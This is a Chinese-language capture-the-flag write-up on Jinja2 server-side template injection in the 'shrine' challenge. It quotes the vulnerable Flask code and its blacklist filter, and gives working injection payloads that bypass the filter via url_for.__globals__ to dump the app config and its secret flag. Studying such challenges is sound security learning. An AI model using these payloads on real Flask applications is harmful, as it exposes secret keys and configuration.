SSTI模板注入类题目
模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection)
模板渲染接受的参数需要用两个大括号括起来{{}},所以我们需要在大括号内构造参数形成注入
SSTI注入需要知道用的是什么模板引擎,参考这张图片
整理一下题目给出的python代码
import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine)) if __name__ == '__main__': app.run(debug=True)
可以看到有两个路由,第一个路由给出了显示出源代码,第二个路由在/shrine/路径下提交参数,模板中设定{{ }}包括的内容为后端变量,% %包括的内容为逻辑语句
我们简单测试注入/shrine/{{2+2}}
我们查看源码,可以知道我们提交的参数之中的()会被置为空,同时会将黑名单内的内容遍历一遍,把参数内的与黑名单相同的置为None
/shrine/{{config}}
如果没有黑名单的时候,我们可以使用config,传入 config,或者使用
self传入 {{self.__dict__}}
当config,self,()都被过滤的时候,为了获取讯息,我们需要读取一些例如current_app这样的全局变量。
看了其他师傅的WP,python的沙箱逃逸这里的方法是利用python对象之间的引用关系来调用被禁用的函数对象。
这里有两个函数包含了current_app全局变量,url_for和get_flashed_messages
官方文档在https://flask.palletsprojects.com/en/1.0.x/api/#flask.get_flashed_messages
我们注入{url_for.__globals__}得到
current_app是当前使用的app,继续注入当前app的config
{url_for.__globals__['current_app'].config}
可以看到get flag
get_flashed_messages注入的方法同理
继续学习,积累思路
参考链接:
http://shaobaobaoer.cn/archives/665/tokyo-westerns-ctf-2018-web-wp#shrine
http://luty.tech/2018/11/13/CTF%E9%A2%98%E8%A7%A3%E8%AE%B0%E5%BD%95-web%E7%AF%87/
http://www.cl4y.top/buuctf_wp/#toc-head-37